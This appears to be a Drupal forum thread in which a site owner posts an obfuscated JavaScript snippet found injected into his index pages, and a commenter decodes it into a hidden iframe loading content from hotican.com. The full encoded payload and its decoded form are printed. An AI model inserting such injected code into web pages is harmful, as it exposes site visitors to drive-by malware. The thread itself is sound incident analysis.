HI,

I recently notice a piece of code in my pages. I was wondering if anyone has seen this. It appears to be an injected javascript. Here's the code:

echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,104,106,103,52,61,34,104,111,116,34,59,118,97,114,32,119,61,34,105,34,59,118,97,114,32,114,101,54,61,34,99,97,110,46,34,59,118,97,114,32,114,114,116,116,54,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,104,106,103,52,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,114,114,116,116,54,43,39,47,39,43,39,34,32,119,105,100,116,104,61,34,49,34,32,104,101,105,103,104,116,61,34,50,34,62,60,47,105,39,43,39,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,119,54,61,48,48,53,48,51,50,48,48,48,48,48,50,49,48))</script>';

It is bizarre and appears only in all my index.html and index.php pages. Please let me know if anyone has seen this and what you think it might be. Is it an attack of some kind? Thanks.

--Jimmy

Comments

grobemo’s picture

It seems malicious to me. Delete it. You may also want to contact the security team to report the problem, especially if it reappears and/or if you're using the latest version of Drupal.

It's printing an <iframe> to your page. Here's the JavaScript it's evaluating, decoded:

var hjg4="hot";
var w="i";
var re6="can.";
var rrtt6="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+hjg4+''+w+''+re6+''+rrtt6+'/'+'" width="1" height="2">');

The iframe, which will be virtually invisible on your page, points to hotican.com, which appears to try to load a PDF. (I don't know what the PDF is. I haven't opened it.)

dpearcefl’s picture

Status: Active » Closed (won't fix)

Doesn't look like a Drupal problem.